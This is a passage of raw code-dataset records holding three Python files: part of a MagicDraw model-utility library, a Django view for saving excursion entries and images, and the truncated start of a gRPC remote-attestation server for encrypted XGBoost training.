False))[0]\nBooleanValueType = filter(lambda element: element.getName() == 'Boolean',\n ModelHelper.getElementsOfType(project.getModel(), [DataType], False))[0]\n\nTrueStrings = ['true', 't']\nFalseStrings = ['false', 'f']\n\nguiLog = Application.getInstance().getGUILog()\nelementsFactory = project.getElementsFactory()\n\ndef getRealizedInterfaces(cs):\n \"\"\"\n get the interfaces that given model elements realize (Interface Realization)\n params:\n a list of model elements\n returns:\n a list of interfaces, empty list if nothing found\"\"\"\n i = []\n for c in cs:\n for r in c.get_directedRelationshipOfSource():\n if isinstance(r, InterfaceRealization):\n i.append(ModelHelper.getSupplierElement(r))\n return i\n\ndef getInfoFlows(source, target):\n \"\"\"\n get the conveyed information from source to target\n assumes there's at most one information flow for a given source and target\n uses the first information flow it finds otherwise\n params:\n source model element\n target model element\n returns:\n a list of conveyed information model elements, empty list if none\"\"\"\n for r in source.get_directedRelationshipOfSource():\n if isinstance(r, InformationFlow):\n if ModelHelper.getSupplierElement(r) == target:\n return r.getConveyed()\n return []\n\ndef getInfoFlowsConveyed(e, out):\n '''\n params:\n a model element\n boolean: direction\n returns:\n information conveyed on information flows into or out of element (toggle by out)'''\n all = []\n if not out:\n for r in e.get_directedRelationshipOfTarget():\n if isinstance(r, InformationFlow):\n for i in r.getConveyed():\n if i not in all:\n all.append(i)\n else:\n for r in e.get_directedRelationshipOfSource():\n if isinstance(r, InformationFlow):\n for i in r.getConveyed():\n if i not in all:\n all.append(i)\n return all\n\ndef expandGeneralizations(es):\n res = []\n for e in es:\n res.append(e)\n res.extend(collectGeneralizations(e, True))\n res.extend(collectGeneralizations(e, False))\n return res\n\ndef collectRelationshipEndsByStereotype(source, s, supplier):\n \"\"\"\n get related elements related with given stereotype (includes derived)\n params:\n a model element\n a stereotype element\n boolean: whether to treat model element as source or target of relationship\n returns:\n list of model elements, empty list if none\"\"\"\n relevant = []\n rs = None\n if supplier:\n rs = source.get_directedRelationshipOfTarget()\n else:\n rs = source.get_directedRelationshipOfSource()\n for r in rs:\n if StereotypesHelper.hasStereotypeOrDerived(r, s):\n if supplier:\n relevant.append(ModelHelper.getClientElement(r))\n else:\n relevant.append(ModelHelper.getSupplierElement(r))\n return relevant\n\ndef collectManyRelationshipEndsByStereotype(sources, s, supplier):\n \"\"\"\n get related elements related with given stereotype (includes derived)\n params:\n list of model elements\n a stereotype element\n boolean: whether to treat model elements as source or target of relationship\n returns:\n list of model elements, empty list if none\"\"\"\n alls = []\n for e in sources:\n blah = collectRelationshipEndsByStereotype(e, s, supplier)\n for b in blah:\n if b not in alls:\n alls.append(b)\n return alls\n\n# internal func\ndef _collectRecursivePartsElements(source, alls):\n #alls.append(source)\n parts = source.getPart()\n for p in parts:\n t = p.getType()\n if t is not None:\n alls.append(t)\n _collectRecursivePartsElements(t, alls)\n\ndef collectPartElementsByStereotypes(source, filters):\n \"\"\"\n get all children of model element by composition recursively (not including model element) with given stereotypes (including derived)\n params:\n a model element (has to be subclass of StructuredClassifier)\n list of stereotype elements\n returns:\n list of children that fits stereotypes, or empty list\"\"\"\n alls = []\n _collectRecursivePartsElements(source, alls)\n return filterElementsByStereotypes(alls, filters)\n\ndef collectRecursivePartsElements(source):\n \"\"\"\n get all children of model element by composition recursively (not including model element)\n params:\n a model element (has to be subclass of StructuredClassifier)\n list of stereotype elements\n returns:\n list of children or empty list\"\"\"\n alls = []\n _collectRecursivePartsElements(source, alls)\n return alls\n\n# input is a list of elements, stereotype is a stereotype element\ndef filterElementsByStereotypes(sourceList, stereotypes):\n ret = []\n for s in sourceList:\n for t in stereotypes:\n if StereotypesHelper.hasStereotypeOrDerived(s, t) and s not in ret:\n ret.append(s)\n return ret\n\ndef filterElementsByStereotypedType(elements, stereotype):\n return filter(lambda element: StereotypesHelper.hasStereotypeOrDerived(element.getType(), stereotype),\n elements)\n\n# internal func\ndef _collectRecursiveOwnedElements(source, alls):\n if not isinstance(source, Package):\n return\n owned = source.getOwnedElement()\n alls.extend(owned)\n for e in owned:\n _collectRecursiveOwnedElements(e, alls)\n\ndef collectElementsByStereotypes(source, filters):\n \"\"\"\n get all owned elements of model element (diagram or package) with given stereotypes (including derived)\n if source is diagram, gives all model elements on that diagram (not presentation elements)\n params:\n a model element (can be diagram or Package)\n list of stereotype elements\n returns:\n list of elements that fits stereotypes, or empty list\"\"\"\n alls = []\n if isinstance(source, Diagram):\n project = Application.getInstance().getProject()\n alls.extend(project.getDiagram(source).getUsedModelElements(False))\n else:\n _collectRecursiveOwnedElements(source, alls)\n return filterElementsByStereotypes(alls, filters)\n\n# internal func\ndef _collectGeneralizationsRecursive(source, down, alls):\n rs = None\n if down:\n rs = source.get_directedRelationshipOfTarget()\n else:\n rs = source.get_directedRelationshipOfSource()\n for r in rs:\n if isinstance(r, Generalization):\n if down:\n alls.append(ModelHelper.getClientElement(r))\n _collectGeneralizationsRecursive(ModelHelper.getClientElement(r), down, alls)\n else:\n alls.append(ModelHelper.getSupplierElement(r))\n _collectGeneralizationsRecursive(ModelHelper.getSupplierElement(r), down, alls)\n\ndef collectGeneralizations(source, down):\n \"\"\"\n get all generalize related elements from model element, regardless of depth\n params:\n model element\n boolean: more specific or more general\n returns:\n list of generalization elements\"\"\"\n relevant = []\n _collectGeneralizationsRecursive(source, down, relevant)\n return relevant\n\ndef getUserSelections(types, root, multiple, name='Select element(s)', display=None):\n \"\"\"\n shows a selection box\n params:\n a list of model metaclasses selectable (this is the actual class from imports)\n note to display nested elements (for example, pins on actions), you have to provide\n all metaclasses that owns those elements, and they have to be \"concrete\" classes (as shown in MD's spec dialog)\n ex. to show pins as selectables: give [Activity, CallBehaviorAction, OutputPin, InputPin]\n [Activity, Action, Pin] WILL NOT WORK!!!\n root of the selection (usually just project.getModel() to display the entire model tree)\n boolean multiple: whether can select multiple\n returns:\n if multiple is false, returns selected element\n if multiple is true, returns list of selected elements\n if user didn't click ok, returns None\"\"\"\n a = SelectElementTypes(display,types)\n #SelectElementType(display, select)\n b = SelectElementInfo(False, True, True, True)\n b.root = root\n b.showDiagrams = False\n b.showNone = False\n b.sortable = True\n z = None\n if not multiple:\n z = SelectElementDlg(MDDialogParentProvider.getProvider().getDialogParent(), None, a, b)\n z.setTitle(name)\n else:\n z = SelectElementsDlg(MDDialogParentProvider.getProvider().getDialogParent(), a, b, False, False, None)\n z.setTitle(name)\n z.setVisible(True)\n if z.isOk():\n return z.getSelected()\n return None\n\ndef getUserDropdownSelection(title, message, selectionElements):\n elementStrings = [e.getQualifiedName() for e in selectionElements]\n input = JOptionPane.showInputDialog(None, message, title, JOptionPane.PLAIN_MESSAGE, None, elementStrings, None)\n if input is not None:\n index = elementStrings.index(input)\n return selectionElements[index]\n return input\n\ndef getUserCheckboxSelections(title, message, selectionElements):\n elementStrings = [e.getName() for e in selectionElements]\n checkboxes = [JCheckBox(e) for e in elementStrings]\n l = [message]\n l.extend(checkboxes)\n \n input = JOptionPane.showMessageDialog(None, array(l, Object), title, JOptionPane.QUESTION_MESSAGE)\n checked = [e.isSelected() for e in checkboxes]\n res = []\n i = 0\n for check in checked:\n if check:\n res.append(selectionElements[i])\n i = i+1\n return res \n\ndef getConnectedPins(pin, out=True):\n \"\"\"\n gets the pins this is connected to (in the context of one activity diagram or in one activity)\n params: \n an input or output pin (can also be fork/join or decision/merge node, or parameter node)\n optional boolean if fork/join or decision/merge: True is find all pins connected from the node (default), false is pins to node\n returns:\n list of pin elements or parameter nodes\"\"\"\n pins = []\n #todo: take care of actiivty parameter node that are INOUT or RETURN? account for circular loops\n if isinstance(pin, InputPin) or (isinstance(pin, ControlNode) and not out) or (isinstance(pin, ActivityParameterNode) and pin.getParameter().getDirection() == ParameterDirectionKindEnum.OUT):\n for f in pin.getIncoming():\n p = f.getSource()\n if isinstance(p, ControlNode):\n pins.extend(getConnectedPins(p, False))\n else: #what if activity param node?\n pins.append(p)\n elif isinstance(pin, OutputPin) or (isinstance(pin, ControlNode) and out) or (isinstance(pin, ActivityParameterNode) and pin.getParameter().getDirection() == ParameterDirectionKindEnum.IN):\n for f in pin.getOutgoing():\n p = f.getTarget()\n if isinstance(p, ControlNode):\n pins.extend(getConnectedPins(p, True))\n else:\n pins.append(p)\n return pins\n \ndef getBaseOfPin(pin):\n \"\"\"\n gets the lowest level pin(s) connected to the given pin\n ex. given a pin on an action, find its parameter/parameter node if available \n and drill down recursively to see what the lowest level pins it represents,\n this can be more than one due to fork and decision nodes\n input:\n a pin \n returns:\n a list of the lowest level pins, if pin given is already lowest level, returns given pin in a list\"\"\"\n param = pin.getParameter()\n if param is None:\n return [pin]\n paramNode = param.get_activityParameterNodeOfParameter()\n if not paramNode.isEmpty():\n paramNode = paramNode.iterator().next()\n else:\n return [pin]\n paramNodeConnected = getConnectedPins(paramNode)\n if len(paramNodeConnected) == 0:\n return [pin]\n else:\n collect = []\n for p in paramNodeConnected:\n collect.extend(getBaseOfPin(p))\n return collect\n\ndef getAllRelatedParamNodePins(param, excludes=[]):\n \"\"\"\n gets all the related parameter nodes, pins, and parameters related to input parameter\n This will trace from the input parameter, to its pin instances, its parameter nodes, to all the other\n pins and nodes and their parameters that this is connected to. In other words, everything that's \n related to input parameter regardless of degree of separation\n input:\n parameter of an activity\n optional: list of parameters to exclude\n returns:\n list of pins, activity parameter nodes, and parameters\"\"\"\n res = []\n newExcludes = list(excludes)\n newExcludes.append(param)\n paramPins = param.get_pinOfParameter()\n for pin in paramPins:\n related = getConnectedPins(pin)\n for r in related:\n rparam = r.getParameter()\n if rparam is not None and rparam not in excludes:\n res.extend(getAllRelatedParamNodePins(rparam, newExcludes))\n res.append(rparam)\n paramNodes = param.get_activityParameterNodeOfParameter()\n for node in paramNodes:\n related = getConnectedPins(node)\n for r in related:\n rparam = r.getParameter()\n if rparam not in excludes:\n res.extend(getAllRelatedParamNodePins(rparam, newExcludes))\n res.append(rparam)\n res.extend(paramPins)\n res.extend(paramNodes)\n return res\n\ndef getContainingActivities(act):\n \"\"\"\n shows where an activity is used as an action in all levels\n input:\n activity\n returns:\n list of activities that contain an instance of given activity\n empty list if none\"\"\"\n returns = []\n calls = act.get_callBehaviorActionOfBehavior()\n for c in calls:\n returns.append(c.getActivity())\n return returns\n\ndef getActivityDiagram(act):\n '''\n input:\n activity\n returns:\n the first diagram element found in activity, None if none'''\n for e in act.getOwnedElement():\n if isinstance(e, Diagram):\n return e\n return None\n \n\ndef intersectionOfLists(a, b):\n #return list(set(a).intersection(set(b)))\n r = []\n for i in a:\n if i in b:\n r.append(i)\n return r\n \ndef getNonRedefinedAttrs(e):\n ref = []\n for a in e.getOwnedAttribute():\n if not a.hasRedefinedProperty():\n ref.append(a)\n return ref\n\ndef getRedefinedAttrs(e):\n ref = []\n for a in e.getOwnedAttribute():\n if a.hasRedefinedProperty():\n ref.append(a)\n return ref\n\ndef setRedefine(parent, child):\n redefs = child.getRedefinedProperty()\n if isinstance(child, Port):\n redefs = child.getRedefinedPort()\n redefs.clear()\n redefs.add(parent)\n\n\ndef findRedefinedInChild(prop, child):\n '''\n returns the first property in child found to redefine prop'''\n for cprop in child.getOwnedAttribute():\n if cprop.hasRedefinedProperty():\n for r in cprop.getRedefinedProperty():\n if r is prop:\n return cprop\n return None\n\ndef findAllRedefinedInChild(prop, child):\n '''\n returns all properties in child found to redefine prop as a list'''\n res = []\n for attr in child.getOwnedAttribute():\n if attr.hasRedefinedProperty():\n for redef in attr.getRedefinedProperty():\n if redef is prop:\n res.append(attr)\n return res\n\ndef findConstraintPartBindings(conpart):\n '''\n for a given part, returns a map of ports to a map of connectors to the connected in the context of this part\n input:\n a part (this was originally written for sysml constraint parts, but should work for any part)\n returns:\n format: {port: {connector: opposite_role, ...}, ...}'''\n bindings = {}\n con = conpart.getType()\n if con is None:\n return bindings\n for p in con.getOwnedPort():\n connectors = {}\n for cend in p.getEnd():\n if cend.getPartWithPort() is conpart:\n connector = cend.get_connectorOfEnd()\n ends = connector.getEnd()\n if ends.size() == 2:\n iterator = ends.iterator()\n end1 = iterator.next()\n if end1 is not cend:\n connectors[connector] = end1.getRole()\n else:\n connectors[connector] = iterator.next().getRole()\n else:\n pass\n #connector have to have 2 ends?!\n bindings[p] = connectors\n return bindings\n \ndef copyStereotypes(a, b):\n for s in StereotypesHelper.getStereotypes(a):\n if not StereotypesHelper.hasStereotypeOrDerived(b, s):\n StereotypesHelper.addStereotype(b, s)\n smap = StereotypesHelper.getPropertiesIncludingParents(s)\n for sp in smap.keySet():\n props = smap.get(sp)\n for p in props:\n values = StereotypesHelper.getStereotypePropertyValue(a, s, p.getName())\n if len(values) == 1:\n StereotypesHelper.setStereotypePropertyValue(b, s, p.getName(), values.get(0))\n elif len(values) > 1:\n StereotypesHelper.setStereotypePropertyValue(b, s, p.getName(), values)\n\n\ndef createClass(name, owner):\n new = createOwnedElement(elementsFactory.createClassInstance, name, owner)\n return new\n\ndef createStereotypedClass(name, owner, stereotypes):\n new = createClass(name, owner)\n addStereotypes(new, stereotypes)\n return new\n\ndef createPackage(name, owner):\n new = createOwnedElement(elementsFactory.createPackageInstance, name, owner)\n return new\n\ndef createStereotypedPackage(name, owner, stereotypes):\n new = createOwnedElement(elementsFactory.createPackageInstance, name, owner)\n addStereotypes(new, stereotypes)\n return new\n\ndef createDependency(name, owner, client, supplier):\n new = createOwnedElement(elementsFactory.createDependencyInstance, name, owner)\n ModelHelper.setSupplierElement(new, supplier)\n ModelHelper.setClientElement(new, client)\n return new\n\ndef createStereotypedDependency(name, owner, client, supplier, stereotypes):\n new = createDependency(name, owner, client, supplier)\n addStereotypes(new, stereotypes)\n return new\n\ndef addStereotypes(element, stereotypes):\n for stereotype in stereotypes:\n StereotypesHelper.addStereotype(element, stereotype)\n \ndef createOwnedElement(createFunction, name, owner):\n new = createFunction()\n new.setOwner(owner)\n new.setName(name)\n return new\n\ndef findPackages(name, parentPackage):\n return filter(lambda x: x.getName() == name, parentPackage.getNestedPackage())\n\ndef removePackage(package):\n ModelElementsManager.getInstance().removeElement(package)\n\ndef removePackages(packages):\n for package in packages:\n removePackage(package)\n \ndef getOwnedElementsByStereotype(parentElement, stereotype = \"Block\"):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotype), parentElement.getOwnedElement())\n\n# Given an element, it returns all elements owned by the element that have the specified stereotypes\ndef getOwnedElementsByStereotypes(parentElement, stereotypes):\n return filter(lambda element: all(StereotypesHelper.hasStereotype(element, stereotype) \\\n for stereotype in stereotypes), \n parentElement.getOwnedElement())\n\ndef getOwnedElementsByAnyStereotypes(parentElement, stereotypes):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotypes), \n parentElement.getOwnedElement())\n\ndef getOwnedPackages(element):\n return getOwnedElementsByStereotype(element, \"Package\")\n\ndef getOwnedElementsByName(parentElement, name=\"\"):\n if \"\" == name:\n name = parentElement.getName()\n namedChildren = filter(lambda element: isinstance(element, NamedElement), parentElement.getOwnedElement())\n return filter(lambda element: str(name) == str(element.getName()), namedChildren)\n\ndef getOwnedAttributesByStereotype(parentElement, stereotype = \"Block\"):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotype),\n parentElement.getOwnedAttribute())\n\ndef getOwnedAttributesByType(parentElement, type):\n return filter(lambda attribute: attribute.getType() == type,\n parentElement.getOwnedAttribute())\n\ndef getOwnedAttributesByAnyTypeStereotypes(parentElement, stereotypes):\n return filter(lambda attribute: StereotypesHelper.hasStereotypeOrDerived(attribute.getType(), stereotypes),\n filter (lambda attribute: attribute.getType() != None, parentElement.getOwnedAttribute()))\n\ndef getOwnedAttributesByAllTypeStereotypes(parentElement, stereotypes):\n return filter(lambda attribute: all(StereotypesHelper.hasStereotypeOrDerived(attribute.getType(), stereotype) \\\n for stereotype in stereotypes),\n parentElement.getOwnedAttribute())\n\n# Given an element, it returns all elements owned by the element that have the specified stereotypes\ndef getOwnedAttributesByAllStereotypes(parentElement, stereotypes):\n return filter(lambda element: all(StereotypesHelper.hasStereotype(element, stereotype) \\\n for stereotype in stereotypes), \n parentElement.getOwnedAttribute())\n\ndef getOwnedAttributesByAnyStereotypes(parentElement, stereotypes):\n return filter(lambda element: StereotypesHelper.hasStereotype(element, stereotypes), \n parentElement.getOwnedAttribute())\n\ndef getOwnedAttributesByName(parentElement, name=\"\"):\n if \"\" == name:\n name = parentElement.getName()\n namedChildren = filter(lambda element: isinstance(element, NamedElement), parentElement.getOwnedAttribute())\n return filter(lambda element: str(name) == str(element.getName()), namedChildren)\n\n# Todo:\n# * Need to check that property is UML property type.\n# * Need to make sure that UML instance values are handled correctly\ndef getDefault(property):\n if property != None:\n default = property.getDefault()\n if default != None:\n if StereotypesHelper.hasStereotypeOrDerived(property, ValuePropertyStereotype):\n if default == '':\n return None\n else:\n return float(default)\n #elif isinstance(property, BooleanValueType):\n # if lower(default) in TrueStrings:\n # return True\n # elif lower(default) in FlaseStrings:\n # return False\n # else:\n # return None\n else:\n return default\n else:\n return default\n else:\n return None\n\n# Todo:\n# * Need to check that property is UML property type.\n# * Need to make sure that UML instance values are handled correctly\ndef setDefault(property, default):\n if default != None:\n #if isinstance(property, RealValueType):\n # defaultValue = elementsFactory.createLiteralUnlimitedNaturalInstance()\n # defaultValue.setValue(float(default))\n #elif isinstance(property, IntegerValueType):\n # defaultValue = elementsFactory.createLiteralIntegerInstance()\n # defaultValue.setValue(int(round(float(default))))\n #elif isinstance(property, BooleanValueType):\n # defaultValue = elementsFactory.createBooleanInstance()\n # if not default in [True, False]:\n # default = lower(default) in TrueStrings\n # defaultValue.setValue(default)\n #else:\n defaultValue = elementsFactory.createLiteralStringInstance()\n defaultValue.setValue(str(default))\n property.setDefaultValue(defaultValue)\n return defaultValue\n else:\n return None\n\ndef doRecursively(parent, getChildrenFunction, doForEachChildFunction, doOnExitFunction, *args):\n try:\n for child in getChildrenFunction(parent):\n doForEachChildFunction(child, *args)\n doRecursively(child, getChildrenFunction, doForEachChildFunction, doOnExitFunction, *args)\n doOnExitFunction(parent, *args)\n except:\n raise\n\ndef createGeneralizationInstance(parent, child):\n ''' Creates a generalization instance and:\n 1. Sets the generalization supplier as the parent.\n 2. Sets the generalization client as the child.\n 3. Sets the owner of the generalization as the child. '''\n generalizationInstance = elementsFactory.createGeneralizationInstance()\n ModelHelper.setClientElement(generalizationInstance, child)\n ModelHelper.setSupplierElement(generalizationInstance, parent)\n generalizationInstance.setOwner(child)\n","sub_path":"src/main/dist/DocGenUserScripts/MDUtils/_MDUtils.py","file_name":"_MDUtils.py","file_ext":"py","file_size_in_byte":27742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"97733649","text":"import json\nfrom uuid import uuid4\nfrom django.core.files.base import ContentFile\nfrom django.db.transaction import atomic\nfrom django.http.response import HttpResponseBadRequest\nfrom excursions.models import Excursion, ExcursionCategory, ExcursionImage\n\n\ndef _excursion_context(request):\n categories = ExcursionCategory.objects\n if not request.user.has_perm(\"excursions.change_excursion\"):\n categories = categories.visible()\n categories = categories.order_by(\"order\", \"title\")\n\n if not request.user.is_authenticated():\n categories = filter(lambda c: Excursion.objects.filter(category=c, published=True).count() > 0, categories)\n\n return {\n 'categories': categories\n }\n\n\n@atomic\ndef _save_excursions_galley_images_order(request):\n order = request.POST['order']\n order = json.loads(order)\n for image in ExcursionImage.objects.filter(id__in=order.keys()):\n image.order = order[unicode(image.id)] or 100\n image.save()\n\n\ndef _excursion_save(request):\n if 'id' in request.POST:\n e = Excursion.objects.get(pk=int(request.POST['id']))\n else:\n if 'category_id' in request.POST:\n e = Excursion()\n else:\n return HttpResponseBadRequest(\"category_id is not defined\")\n if 'small_image' in request.FILES:\n f = request.FILES['small_image']\n ext = f.name.split('.')[-1]\n e.img_preview.delete()\n e.img_preview.save('%s.%s' % (uuid4(), ext), ContentFile(f.read()))\n e.save()\n\n if 'big_image' in request.FILES:\n f = request.FILES['big_image']\n ext = f.name.split('.')[-1]\n if e.image.name:\n e.image.delete()\n e.image.save('%s.%s' % (uuid4(), ext), ContentFile(f.read()))\n e.save()\n\n if 'gallery[]' in request.FILES:\n for f in request.FILES.getlist('gallery[]'):\n ext = f.name.split('.')[-1]\n image = ExcursionImage()\n image.excursion = e\n image.image.save('%s.%s' % (uuid4(), ext), ContentFile(f.read()))\n image.save()\n\n if 'yandex_map_script' in request.POST:\n e.yandex_map_script = request.POST['yandex_map_script']\n\n if 'order' in request.POST:\n _save_excursions_galley_images_order(request)\n\n if 'category_id' in request.POST and e.category_id != int(request.POST['category_id']):\n e.category_id = int(request.POST['category_id'])\n\n if 'title' in request.POST:\n e.title = request.POST['title']\n\n if 'price_list' in request.POST:\n e.priceList = request.POST['price_list']\n\n if 'time_length' in request.POST:\n e.time_length = request.POST['time_length']\n\n if 'min_age' in request.POST:\n e.min_age = request.POST['min_age']\n\n if 'description' in request.POST:\n e.description = request.POST['description']\n\n if 'short_description' in request.POST:\n e.short_description = request.POST['short_description']\n\n if 'published' in request.POST:\n e.published = request.POST['published'] == 'True'\n\n if 'popular' in request.POST:\n e.popular = request.POST['popular'] == 'True'\n\n e.save()","sub_path":"apps/excursions/views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"228401377","text":"# Copyright 2015 gRPC authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"The Python implementation of the GRPC RemoteAttestation server.\"\"\"\n\nfrom concurrent import futures\nimport logging\n\nimport grpc\n\n# import rpc.remote_pb2\n# import rpc.remote_pb2_grpc\nfrom .rpc import remote_pb2\nfrom .rpc import remote_pb2_grpc\nfrom rpc_utils import *\nimport os\nimport sys\nimport traceback\nfrom .core import RemoteAPI as remote_api\n\n# c_bst_ulong corresponds to bst_ulong defined in xgboost/c_api.h\nc_bst_ulong = ctypes.c_uint64\n\n\nimport threading\nimport types\n\nclass Command(object):\n \"\"\"\n Commands submitted for execution to remote server\n \"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self._func = None\n self._params = None\n self._ret = None\n self._usernames = []\n self._signatures = []\n self._sig_lengths = []\n self._retrieved = []\n\n def submit(self, func, params, username):\n if self._func is None:\n self._func = func\n self._params = params\n else:\n assert self._func == func\n self._usernames.append(username)\n self._signatures.append(params.signature)\n self._sig_lengths.append(params.sig_len)\n\n def is_ready(self):\n for user in globals()[\"all_users\"]:\n if user not in self._usernames:\n return False\n return True\n\n def invoke(self):\n self._ret = self._func(self._params, self._usernames, self._signatures, self._sig_lengths)\n\n def result(self, username):\n self._retrieved.append(username)\n ret = self._ret\n if self.is_complete():\n self.reset()\n return ret\n\n def is_complete(self):\n for user in globals()[\"all_users\"]:\n if user not in self._retrieved:\n return False\n return True\n\n\ndef handle_exception():\n e = sys.exc_info()\n print(\"Error type: \" + str(e[0]))\n print(\"Error value: \" + str(e[1]))\n traceback.print_tb(e[2])\n\n status = remote_pb2.Status(status=-1, exception=str(e[1]))\n return status\n\n\nclass RemoteServicer(remote_pb2_grpc.RemoteServicer):\n\n def __init__(self, enclave, condition, command):\n self.enclave = enclave\n self.condition = condition\n self.command = command\n\n def _synchronize(self, func, params):\n username = params.username\n\n self.condition.acquire() \n self.command.submit(func, params, username)\n if self.command.is_ready():\n self.command.invoke()\n ret = self.command.result(username)\n self.condition.notifyAll()\n else:\n self.condition.wait()\n ret = self.command.result(username)\n self.condition.release()\n return ret\n\n def rpc_get_remote_report_with_pubkey(self, request, context):\n \"\"\"\n Calls get_remote_report_with_pubkey()\n \"\"\"\n try:\n # Get report from enclave\n pem_key, pem_key_size, remote_report, remote_report_size = remote_api.get_remote_report_with_pubkey(request)\n\n status = remote_pb2.Status(status=0)\n return remote_pb2.Report(pem_key=pem_key, pem_key_size=pem_key_size, remote_report=remote_report, remote_report_size=remote_report_size, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Report(status=status)\n\n def rpc_get_remote_report_with_pubkey_and_nonce(self, request, context):\n pem_key, key_size, nonce, nonce_size, remote_report, remote_report_size = remote_api.get_remote_report_with_pubkey_and_nonce(request)\n\n return remote_pb2.Report(pem_key=pem_key, pem_key_size=key_size,\n nonce=nonce, nonce_size=nonce_size,\n remote_report=remote_report, remote_report_size=remote_report_size)\n\n # FIXME implement the library call within class RemoteAPI\n def rpc_add_client_key(self, request, context):\n \"\"\"\n Sends encrypted symmetric key, signature over key, and filename of data that was encrypted using the symmetric key\n \"\"\"\n try:\n # Get encrypted symmetric key, signature, and filename from request\n enc_sym_key = request.enc_sym_key\n key_size = request.key_size\n signature = request.signature\n sig_len = request.sig_len\n\n # Get a reference to the existing enclave\n result = self.enclave._add_client_key(enc_sym_key, key_size, signature, sig_len)\n\n return remote_pb2.Status(status=result)\n except:\n status = handle_exception()\n return status\n\n # FIXME implement the library call within class RemoteAPI\n def rpc_add_client_key_with_certificate(self, request, context):\n \"\"\"\n Calls add_client_key_with_certificate()\n \"\"\"\n try:\n # Get encrypted symmetric key, signature, and certificate from request\n certificate = request.certificate\n enc_sym_key = request.enc_sym_key\n key_size = request.key_size\n signature = request.signature\n sig_len = request.sig_len\n\n # Get a reference to the existing enclave\n result = self.enclave._add_client_key_with_certificate(certificate, enc_sym_key, key_size, signature, sig_len)\n\n return remote_pb2.Status(status=result)\n except:\n status = handle_exception()\n return status\n\n def rpc_get_enclave_symm_key(self, request, context):\n \"\"\"\n Calls get_remote_report_with_pubkey()\n \"\"\"\n try:\n # Get report from enclave\n enc_key, enc_key_size = remote_api.get_enclave_symm_key(request)\n enc_key_proto = pointer_to_proto(enc_key, enc_key_size + CIPHER_IV_SIZE + CIPHER_TAG_SIZE)\n\n status = remote_pb2.Status(status=0)\n return remote_pb2.EnclaveKey(key=enc_key_proto, size=enc_key_size, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Report(status=status)\n\n def rpc_XGDMatrixCreateFromEncryptedFile(self, request, context):\n \"\"\"\n Create DMatrix from encrypted file\n \"\"\"\n try:\n dmatrix_handle = self._synchronize(remote_api.XGDMatrixCreateFromEncryptedFile, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Name(name=dmatrix_handle, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Name(name=None, status=status)\n\n def rpc_XGBoosterSetParam(self, request, context):\n \"\"\"\n Set booster parameter\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterSetParam, request)\n return remote_pb2.Status(status=0)\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterCreate(self, request, context):\n \"\"\"\n Create a booster\n \"\"\"\n try:\n booster_handle = self._synchronize(remote_api.XGBoosterCreate, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Name(name=booster_handle, status=status)\n except:\n status = handle_exception()\n return remote_pb2.Name(status=status)\n\n def rpc_XGBoosterUpdateOneIter(self, request, context):\n \"\"\"\n Update model for one iteration\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterUpdateOneIter, request)\n return remote_pb2.Status(status=0)\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterPredict(self, request, context):\n \"\"\"\n Get encrypted predictions\n \"\"\"\n try:\n enc_preds, num_preds = self._synchronize(remote_api.XGBoosterPredict, request)\n enc_preds_proto = pointer_to_proto(enc_preds, num_preds * ctypes.sizeof(ctypes.c_float) + CIPHER_IV_SIZE + CIPHER_TAG_SIZE)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Predictions(predictions=enc_preds_proto, num_preds=num_preds, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Predictions(status=status)\n\n def rpc_XGBoosterSaveModel(self, request, context):\n \"\"\"\n Save model to encrypted file\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterSaveModel, request)\n return remote_pb2.Status(status=0)\n\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterLoadModel(self, request, context):\n \"\"\"\n Load model from encrypted file\n \"\"\"\n try:\n _ = self._synchronize(remote_api.XGBoosterLoadModel, request)\n return remote_pb2.Status(status=0)\n\n except:\n status = handle_exception()\n return status\n\n def rpc_XGBoosterDumpModelEx(self, request, context):\n \"\"\"\n Get encrypted model dump\n \"\"\"\n try:\n length, sarr = self._synchronize(remote_api.XGBoosterDumpModelEx, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Dump(sarr=sarr, length=length, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Dump(status=status)\n\n def rpc_XGBoosterDumpModelExWithFeatures(self, request, context):\n \"\"\"\n Get encrypted model dump with features\n \"\"\"\n try:\n length, sarr = self._synchronize(remote_api.XGBoosterDumpModelExWithFeatures, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Dump(sarr=sarr, length=length, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Dump(status=status)\n\n def rpc_XGBoosterGetModelRaw(self, request, context):\n \"\"\"\n Get encrypted raw model dump\n \"\"\"\n try:\n length, sarr = self._synchronize(remote_api.XGBoosterGetModelRaw, request)\n status = remote_pb2.Status(status=0)\n return remote_pb2.Dump(sarr=sarr, length=length, status=status)\n\n except:\n status = handle_exception()\n return remote_pb2.Dump(status=status)\n\n def rpc_XGDMatrixNumCol(self, request, context):\n \"\"\"\n Get number of columns in DMatrix\n \"\"\"\n try:\n ret = self._synchronize(remote_api.XGDMatrixNumCol, request)\n status = remote_pb2.Status(status=0)\n return 